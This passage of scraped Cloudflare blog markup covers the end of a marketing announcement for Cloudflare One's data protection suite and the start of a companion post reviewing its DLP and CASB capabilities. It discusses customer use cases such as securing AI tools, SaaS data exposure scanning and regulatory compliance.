particular, are already intersecting. Companies like <a href=\"https://www.businessinsider.com/chatgpt-companies-issued-bans-restrictions-openai-ai-amazon-apple-2023-7\">Amazon, Apple, Verizon, Deutsche Bank, and more</a> are blocking employees from using tools like ChatGPT for fear of losing confidential data, and <a href=\"https://www.forbes.com/sites/siladityaray/2023/05/02/samsung-bans-chatgpt-and-other-chatbots-for-employees-after-sensitive-code-leak/?sh=28ba8bf96078\">Samsung</a> recently had an engineer accidentally upload sensitive code to the tool. As organizations prioritize new digital services and experiences, developers face mounting pressure to work faster and smarter. AI tools can help unlock that productivity, but the long-term consequences of oversharing sensitive data with these tools is still unknown.</p><p>All together, data risks are only primed to escalate, particularly as organizations accelerate digital transformation initiatives with hybrid work and development continuing to expand attack surfaces. At the same time, regulatory compliance will only become more demanding, as more countries and states adopt more stringent data privacy laws.</p><p>Traditional DLP services are not equipped to keep up with these modern risks. A combination of high setup and operational complexity plus negative user experiences means that, in practice, DLP controls are often underutilized or bypassed entirely. Whether deployed as a standalone platform or integrated into security products or SaaS applications, DLP products can often become expensive shelfware. And backhauling traffic through on-premise data protection hardware – whether, DLP, firewall and SWG appliances, or otherwise — create costs and slow user experiences that hold businesses back in the long run.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"figure-1-modern-data-risks\">Figure 1: Modern data risks</h3>\n <a href=\"#figure-1-modern-data-risks\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6f0YWGx04DZ3Xif9A4MYJE/ce203c56220b49e5173473e8a819fd9d/image2.jpg\" alt=\"\" class=\"kg-image\" width=\"1148\" height=\"1999\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-customers-use-cloudflare-for-data-protection\">How customers use Cloudflare for data protection</h2>\n <a href=\"#how-customers-use-cloudflare-for-data-protection\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Today, customers are increasingly turning to Cloudflare to address these data risks, including a Fortune 500 natural gas company, a major US job site, a regional US airline, an Australian healthcare company and more. Across these customer engagements, three use cases are standing out as common focus areas when deploying Cloudflare One for data protection.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"use-case-1-securing-ai-tools-and-developer-code-applied-systems\">Use case #1: Securing AI tools and developer code (Applied Systems)</h3>\n <a href=\"#use-case-1-securing-ai-tools-and-developer-code-applied-systems\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p><a href=\"https://www.cloudflare.com/case-studies/applied-systems\">Applied Systems</a>, an insurance technology &amp; software company, recently deployed Cloudflare One to secure data in AI environments.</p><p>Specifically, the company runs the public instance of ChatGPT in an isolated browser, so that the security team can apply <a href=\"https://developers.cloudflare.com/cloudflare-one/policies/browser-isolation/isolation-policies/#policy-settings\">copy-paste blocks</a>: preventing users from copying sensitive information (including developer code) from other apps into the AI tool. According to Chief Information Security Officer Tanner Randolph, “We wanted to let employees take advantage of AI while keeping it safe.”</p><p>This use case was just one of several Applied Systems tackled when migrating from Zscaler and Cisco to Cloudflare, but we see a growing interest in securing AI and developer code among our customers.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"use-case-2-data-exposure-visibility\">Use case #2: Data exposure visibility</h3>\n <a href=\"#use-case-2-data-exposure-visibility\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Customers are leveraging Cloudflare One to regain visibility and controls over data exposure risks across their sprawling app environments. For many, the first step is analyzing <a href=\"https://developers.cloudflare.com/cloudflare-one/insights/analytics/access/\">unsanctioned app usage</a>, and then taking steps to allow, block, isolate, or apply other controls to those resources. A second and increasingly popular step is scanning SaaS apps for misconfigurations and sensitive data <a href=\"/casb-dlp/\">via a CASB and DLP</a> service, and then taking prescriptive steps to remediate via SWG policies.</p><p>A UK ecommerce giant with 7,5000 employees turned to Cloudflare for this latter step. As part of a broader <a href=\"/descaler-program-update/\">migration strategy from Zscaler to Cloudflare</a>, this company quickly set up API integrations between its SaaS environments and Cloudflare’s CASB and began scanning for misconfigurations. Plus, during this integration process, the company was able to sync DLP policies with <a href=\"/cloudflare-dlp-mip/\">Microsoft Pureview Information Protection sensitivity labels</a>, so that it could use its existing framework to prioritize what data to protect. All in all, the company was able to begin identifying data exposure risks within a day.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"use-case-3-compliance-with-regulations\">Use case #3: Compliance with regulations</h3>\n <a href=\"#use-case-3-compliance-with-regulations\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Comprehensive data regulations like <a href=\"https://www.cloudflare.com/learning/privacy/what-is-the-gdpr/\">GDPR</a>, <a href=\"https://www.cloudflare.com/learning/privacy/what-is-the-ccpa/\">CCPA</a>, <a href=\"https://www.cloudflare.com/learning/privacy/what-is-hipaa-compliance/\">HIPAA</a>, and <a href=\"https://www.ftc.gov/business-guidance/resources/how-comply-privacy-consumer-financial-information-rule-gramm-leach-bliley-act\">GLBA</a> have been in our lives for some time now. But new laws are quickly emerging: for example, <a href=\"https://iapp.org/resources/article/us-state-privacy-legislation-tracker/\">11 U.S. states</a> now have comprehensive privacy laws, up from just 3 in 2021. And updates to existing laws like <a href=\"https://www.cloudflare.com/learning/privacy/what-is-pci-dss-compliance/\">PCI DSS</a> now include stricter, more expansive requirements.</p><p>Customers are increasingly turning to Cloudflare One for compliance, in particular by ensuring they can monitor and protect regulated data (e.g. financial data, health data, <a href=\"https://www.cloudflare.com/learning/privacy/what-is-pii/\">PII</a>, <a href=\"/edm-beta/\">exact data matches</a>, and more). Some common steps include first, detecting and applying controls to sensitive data <a href=\"https://www.cloudflare.com/zero-trust/products/dlp/\">via DLP</a>, next, maintaining detailed audit trails via logs and further SIEM analysis, and finally, reducing overall risk with a comprehensive <a href=\"https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/\">Zero Trust</a> security posture.</p><p>Let’s look at a concrete example. One Zero Trust best practice that is increasingly required is <a href=\"https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/\">multi-factor authentication (MFA)</a>. In the payment cards industry, PCI DSS <a href=\"https://docs-prv.pcisecuritystandards.org/PCI%20DSS/Standard/PCI-DSS-v4_0.pdf\">v4.0</a>, which takes effect in 2025, requires that requests to MFA be enforced for every access request to the cardholder data environment, for every user and for every location – including cloud environments, on-prem apps, workstations and more. (requirement 8.4.2). Plus, those MFA systems must be configured to prevent misuse – including replay attacks and bypass attempts – and must require at least <a href=\"https://www.cloudflare.com/learning/access-management/what-is-two-factor-authentication/\">two different factors</a> that must be successful (requirement 8.5). To help organizations comply with both of these requirements, Cloudflare helps organizations <a href=\"https://developers.cloudflare.com/cloudflare-one/policies/access/mfa-requirements/\">enforce MFA</a> across all apps and users – and in fact, we use our same services to <a href=\"/how-cloudflare-implemented-fido2-and-zero-trust/\">enforce hard key authentication</a> for our own employees.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"figure-2-data-protection-use-cases\">Figure 2: Data protection use cases</h3>\n <a href=\"#figure-2-data-protection-use-cases\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5GTjdlDlstogJwsnIMjPJM/2f69aee02d3fa0a03c86ab097ec440f7/image1.png\" alt=\"\" class=\"kg-image\" width=\"1999\" height=\"1294\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"the-cloudflare-difference\">The Cloudflare difference</h2>\n <a href=\"#the-cloudflare-difference\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare One’s data protection suite is built to stay at the forefront of modern data risks to address these and other evolving use cases.</p><p>With Cloudflare, DLP is not just integrated with other typically distinct security services, like CASB, SWG, ZTNA, RBI, and <a href=\"https://www.cloudflare.com/zero-trust/products/email-security/\">email security</a>, but converged onto a single platform with one control plane and one interface. Beyond the acronym soup, our network architecture is really what enables us to help organizations be more effective, more productive, and more agile with protecting data.</p><p>We simplify connectivity, with flexible options for you to send traffic to Cloudflare for enforcement. Those options include <a href=\"https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/\">API-based scans</a> of SaaS suites for misconfigurations and sensitive data. Unlike solutions that require security teams to get full app permissions from IT or business teams, Cloudflare can find risk exposure with read-only app permissions. <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/agentless/\">Clientless deployments</a> of ZTNA <a href=\"https://developers.cloudflare.com/cloudflare-one/applications/configure-apps/\">to secure application access</a> and of <a href=\"https://developers.cloudflare.com/cloudflare-one/policies/browser-isolation/setup/clientless-browser-isolation/\">browser isolation</a> to control data within websites and apps are scalable for all users — employees and third-parties like contractors — for the largest enterprises. And when you do want to forward proxy traffic, Cloudflare offers <a href=\"https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/\">one device client</a> with self-enrollment permissions or wide area network on-ramps across security services. With so many practical ways to deploy, your data protection approach will be effective and functional — not shelfware.</p><p>Just like your data, our global network is everywhere, now spanning over 300 cities in over 100 countries. We have proven that we enforce controls <a href=\"/spotlight-on-zero-trust/\">faster than vendors like Zscaler, Netskope, and Palo Alto Networks</a> — all with single-pass inspection. We ensure security is quick, reliable, and unintrusive, so you can layer on data controls without disruptive work productivity.</p><p>Our <a href=\"/building-cloudflare-on-cloudflare/\">programmable network architecture</a> enables us to build new capabilities quickly. And we rapidly adopt new security standards and protocols (like IPv6-only connections or HTTP/3 encryption) to ensure data protection remains effective. Altogether, this architecture equips us to evolve alongside changing data protection use cases, like protecting code in AI environments, and quickly deploy AI and <a href=\"https://www.cloudflare.com/learning/ai/what-is-machine-learning/\">machine learning models</a> across our network locations to enforce higher precision, context-driven detections.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"figure-3-unified-data-protection-with-cloudflare\">Figure 3: Unified data protection with Cloudflare</h3>\n <a href=\"#figure-3-unified-data-protection-with-cloudflare\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/73FFaciX34hSOgWf5tlL9M/68b41d876da9c6d7e6e7e99755b4b3d8/image4.png\" alt=\"\" class=\"kg-image\" width=\"1171\" height=\"716\" loading=\"lazy\"/>\n \n </figure>\n <div class=\"flex anchor relative\">\n <h2 id=\"how-to-get-started\">How to get started</h2>\n <a href=\"#how-to-get-started\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Modern data risks demand modern security. We feel that Cloudflare One’s unified data protection suite is architected to help organizations navigate their priority risks today and in the future — whether that is securing developer code and AI tools, regaining visibility over SaaS apps, or staying compliant with evolving regulations.</p><p>If you’re ready to explore how Cloudflare can protect your data, <a href=\"https://www.cloudflare.com/products/zero-trust/plans/enterprise/\">request a workshop</a> with our experts today.</p><p>Or to learn more about how Cloudflare One protects data, read today’s <a href=\"https://www.cloudflare.com/press-releases/2023/cloudflare-announces-unified-data-protection-suite-to-address-the-risks-of/\">press release</a>, visit <a href=\"https://www.cloudflare.com/zero-trust/solutions/data-protection\">our website</a>, or dive deeper with our <a href=\"/cloudflare-one-data-protection-roadmap-preview/\">accompanying technical blog</a>.</p><p>***</p><ol><li><p><a href=\"https://www.gitguardian.com/state-of-secrets-sprawl-report-2023\">The State of Secrets Sprawl 2023, GitGuardian</a></p></li><li><p><a href=\"https://www.salesforce.com/news/stories/generative-ai-statistics/\">Top Generative AI Statistics for 2023, Salesforce</a></p></li><li><p><a href=\"https://www.ibm.com/reports/data-breach\">Cost of a Data Breach Report 2023, IBM</a></p></li><li><p><a href=\"https://salt.security/state-of-the-ciso-2023\">2023 “State of the CISO” report, conducted by Global Survey</a></p></li><li><p><a href=\"https://unctad.org/page/data-protection-and-privacy-legislation-worldwide\">United Nations Conference on Trade &amp; Development</a></p></li><li><p><a href=\"https://iapp.org/resources/article/us-state-privacy-legislation-tracker/\">International Association of Privacy Professionals (IAPP)</a></p></li></ol><p></p><p></p>"],"published_at":[0,"2023-09-07T14:00:35.000+01:00"],"updated_at":[0,"2024-11-22T18:44:36.003Z"],"feature_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7padtdvxmQ4zYHF7FTuk64/68b0db64e47cf6bce1fd710befe639db/cloudflare-one-data-protection-announcement.png"],"tags":[1,[[0,{"id":[0,"4Z2oveL0P0AeqGa5lL4Vo1"],"name":[0,"Cloudflare One"],"slug":[0,"cloudflare-one"]}],[0,{"id":[0,"4yBlHkuMJq9VSFd341CkxY"],"name":[0,"DLP"],"slug":[0,"dlp"]}],[0,{"id":[0,"3iAX3DmDBEfSj3TULqvhPD"],"name":[0,"CASB"],"slug":[0,"casb"]}],[0,{"id":[0,"J61Eszqn98amrYHq4IhTx"],"name":[0,"Zero Trust"],"slug":[0,"zero-trust"]}],[0,{"id":[0,"6Foe3R8of95cWVnQwe5Toi"],"name":[0,"AI"],"slug":[0,"ai"]}],[0,{"id":[0,"6QktrXeEFcl4e2dZUTZVGl"],"name":[0,"Product News"],"slug":[0,"product-news"]}],[0,{"id":[0,"3BWeMuiOShelE7QM48sW9j"],"name":[0,"Privacy"],"slug":[0,"privacy"]}]]],"relatedTags":[0],"authors":[1,[[0,{"name":[0,"James Chang"],"slug":[0,"james-chang"],"bio":[0,"Product Marketing Manager, Zero Trust"],"profile_image":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2pGRVAYlvhVpBi0PSwIEsm/7e11e4ee95088b7b42e962601b715b6d/james-chang.png"],"location":[0,null],"website":[0,null],"twitter":[0,null],"facebook":[0,null]}]]],"meta_description":[0,"This blog announces Cloudflare One for Data Protection — our unified suite to protect data everywhere across web, SaaS, and private applications. Built on and delivered across our entire global network, Cloudflare One’s data protection suite is architected for the risks of modern coding and AI."],"primary_author":[0,{}],"localeList":[0,{"name":[0,"Cloudflare One for Data Protection Config"],"enUS":[0,"English for Locale"],"zhCN":[0,"Translated for Locale"],"zhHansCN":[0,"No Page for Locale"],"zhTW":[0,"Translated for Locale"],"frFR":[0,"Translated for Locale"],"deDE":[0,"Translated for Locale"],"itIT":[0,"No Page for Locale"],"jaJP":[0,"Translated for Locale"],"koKR":[0,"Translated for Locale"],"ptBR":[0,"No Page for Locale"],"esLA":[0,"No Page for Locale"],"esES":[0,"No Page for Locale"],"enAU":[0,"No Page for Locale"],"enCA":[0,"No Page for Locale"],"enIN":[0,"No Page for Locale"],"enGB":[0,"No Page for Locale"],"idID":[0,"No Page for Locale"],"ruRU":[0,"No Page for Locale"],"svSE":[0,"No Page for Locale"],"viVN":[0,"No Page for Locale"],"plPL":[0,"No Page for Locale"],"arAR":[0,"No Page for Locale"],"nlNL":[0,"No Page for Locale"],"thTH":[0,"No Page for Locale"],"trTR":[0,"No Page for Locale"],"heIL":[0,"No Page for Locale"],"lvLV":[0,"No Page for Locale"],"etEE":[0,"No Page for Locale"],"ltLT":[0,"No Page for Locale"]}],"url":[0,"https://blog.cloudflare.com/cloudflare-one-data-protection-announcement"],"metadata":[0,{"title":[0,"Cloudflare One for Data Protection"],"description":[0,"This blog announces Cloudflare One for Data Protection — our unified suite to protect data everywhere across web, SaaS, and private applications. Built on and delivered across our entire global network, Cloudflare One’s data protection suite is architected for the risks of modern coding and AI."],"imgPreview":[0,"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2pyNVXV91vMhkllGLDxyzv/f8ddedc11973a69ede70147808eb55b9/cloudflare-one-data-protection-announcement-kzYGNN.png"]}]}],[0,{"id":[0,"5UtpTLoZcB9dgL16R3HWNw"],"title":[0,"What’s next for Cloudflare One’s data protection suite"],"slug":[0,"cloudflare-one-data-protection-roadmap-preview"],"excerpt":[0,"Cloudflare One just launched its data protection suite. This blog previews new functionality to protect data and code in SaaS environments with our DLP and CASB services and looks back on what we have built over the past year"],"featured":[0,false],"html":[0,"<p></p>\n <figure class=\"kg-card kg-image-card \">\n \n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4WClMGClAUrNY0rHmGzotr/6e13a6250104ebc9b9b6cdff4a34128d/image1-2.png\" alt=\"\" class=\"kg-image\" width=\"1200\" height=\"675\" loading=\"lazy\"/>\n \n </figure><p>Today, we announced Cloudflare One for Data Protection — a unified suite to protect data everywhere across web, SaaS, and private applications. This suite converges capabilities including our <a href=\"https://www.cloudflare.com/learning/access-management/what-is-dlp/\">data loss prevention (DLP)</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-casb/\">cloud access security broker (CASB)</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-ztna/\">Zero Trust network access (ZTNA)</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/\">secure web gateway (SWG)</a>, <a href=\"https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/\">remote browser isolation (RBI)</a>, and <a href=\"https://www.cloudflare.com/learning/email-security/what-is-email-security/\">cloud email security</a> services. The suite is available and packaged now as part of <a href=\"https://www.cloudflare.com/cloudflare-one/\">Cloudflare One</a>, our <a href=\"https://www.cloudflare.com/learning/access-management/what-is-sase/\">SASE</a> platform.</p><p>In the <a href=\"https://cflr.re/data-protection-announcement-blog\">announcement post</a>, we focused on how the data protection suite helps customers navigate modern data risks, with recommended use cases and real-world customer examples.</p><p>In this companion blog post, we recap the capabilities built into the Cloudflare One suite over the past year and preview new functionality that customers can look forward to. This blog is best for practitioners interested in protecting data and SaaS environments using Cloudflare One.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"dlp-casb-capabilities-launched-in-the-past-year\">DLP & CASB capabilities launched in the past year</h2>\n <a href=\"#dlp-casb-capabilities-launched-in-the-past-year\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare launched both <a href=\"/inline-dlp-ga/\">DLP</a> and <a href=\"/casb-ga/\">CASB</a> services in September 2022, and since then have rapidly built functionality to meet the growing needs of our organizations of all sizes. Before previewing how these services will evolve, it is worth recapping the many enhancements added in the past year.</p><p>Cloudflare’s <a href=\"/inline-dlp-ga/\">DLP</a> solution helps organizations detect and protect sensitive data across their environment based on its several characteristics. DLP controls can be critical in preventing (and detecting) damaging leaks and ensuring compliance for regulated classes of data like financial, health, and <a href=\"https://www.cloudflare.com/learning/privacy/what-is-pii/\">personally identifiable</a> information.</p><p>Improvements to DLP detections and policies can be characterized by three major themes:</p><ul><li><p><b>Customization:</b> making it easy for administrators to design DLP policies with the flexibility they want.</p></li><li><p><b>Deep detections:</b> equipping administrators with increasingly granular controls over what data they protect and how.</p></li><li><p><b>Detailed detections:</b> providing administrators with more detailed visibility and logs to analyze the efficacy of their DLP policies.</p></li></ul><p>Cloudflare’s <a href=\"/casb-ga/\">CASB</a> helps organizations connect to, scan, and monitor third-party SaaS applications for misconfigurations, improper data sharing, and other security risks — all via lightweight API integrations. In this way, organizations can regain visibility and controls over their growing investments in SaaS apps.</p><p>CASB product enhancements can similarly be summarized by three themes:</p><ul><li><p><b>Expanding API integrations:</b> Today, our CASB integrates with <a href=\"https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/\">18 of the most popular SaaS apps</a> — Microsoft 365 (including OneDrive), Google Workspace (including Drive), Salesforce, GitHub, and more. Setting up these API integrations takes fewer clicks than first-generation CASB solutions, with comparable coverage to other vendors in the <a href=\"https://www.cloudflare.com/learning/access-management/security-service-edge-sse/\">Security Services Edge (SSE)</a> space.</p></li><li><p><b>Strengthening findings of CASB scans:</b> We have made it easier to remediate the misconfigurations identified by these CASB scans with both prescriptive guides and in-line policy actions built into the dashboard.</p></li><li><p><b>Converging CASB &amp; DLP functionality:</b> We started enabling organizations to <a href=\"/casb-dlp/\">scan SaaS apps for sensitive data, as classified by DLP policies</a>. For example, this helps organizations detect when credit cards or social security numbers are in Google documents or spreadsheets that have been made publicly available to anyone on the Internet.</p></li></ul><p>This last theme, in particular, speaks to the value of unifying data protection capabilities on a single platform for simple, streamlined workflows. The below table highlights some major capabilities launched since our general availability announcements last September.</p>\n <div class=\"flex anchor relative\">\n <h3 id=\"table-1-select-dlp-and-casb-capabilities-shipped-since-2022-q4\">Table 1: Select DLP and CASB capabilities shipped since 2022 Q4</h3>\n <a href=\"#table-1-select-dlp-and-casb-capabilities-shipped-since-2022-q4\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" 